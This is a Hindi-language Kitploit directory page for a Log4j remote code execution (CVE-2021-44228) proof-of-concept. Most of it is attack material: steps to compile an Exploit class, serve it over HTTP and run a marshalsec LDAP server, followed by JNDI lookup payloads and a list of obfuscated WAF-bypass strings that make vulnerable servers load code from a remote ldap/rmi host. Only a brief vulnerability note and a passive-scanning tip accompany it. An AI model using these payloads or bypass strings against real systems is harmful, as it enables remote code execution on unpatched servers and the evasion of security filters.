Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Log4J_0day_RCE — Log4j-RCE (CVE-2021-44228) प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/wysiiwyg/log4j_0day_rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंग
GitHubwysiiwyg/log4j_0day_rce

Log4J_0day_RCE

Log4j-RCE (CVE-2021-44228) प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
1124 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

समुदाय में शामिल हों

Telegram

CVE-2021-44228(Apache Log4j रिमोट कोड निष्पादन)

प्रभावित संस्करण < 2.15.0

उपयोग:

git clone https://github.com/PwnC00re/CVE-2021-44228-Apache-Log4j-Rce.git
cd apache-log4j-poc/src/main/java
javac Exploit.java 
python -m SimpleHTTPServer 8888 
cd tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

अंत में प्रोजेक्ट चलाएँ, आप अपना कैलकुलेटर स्थानीय रूप से देखेंगे।

सुझाव:

आप JNDI-Injection-Exploit का उपयोग करके exploit कर सकते हैं।

rc1 को बायपास करें

उदाहरण के लिए:

${jndi:ldap://127.0.0.1:1389/ badClassName}

WAF को बायपास करें

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

भेद्यता का विवरण

लुकअप्स Log4j कॉन्फ़िगरेशन में मनमाने स्थानों पर मान जोड़ने का एक तरीका प्रदान करते हैं।

लुकअप्स

finally में लीक उत्पन्न करने के तरीके

LogManager.getLogger().error()
LogManager.getLogger().fatal()

सरल जाँच विधि

यदि आप ब्लैक-बॉक्स परीक्षण करना चाहते हैं, मैं सुझाव देता हूँ कि आप निष्क्रिय स्कैनिंग करें।

BurpLog4jScan

मज़े करें!!! BurpLog4jScan.png

समय के साथ स्टारगेज़र्स

Stargazers over time

टूल डाउनलोड करें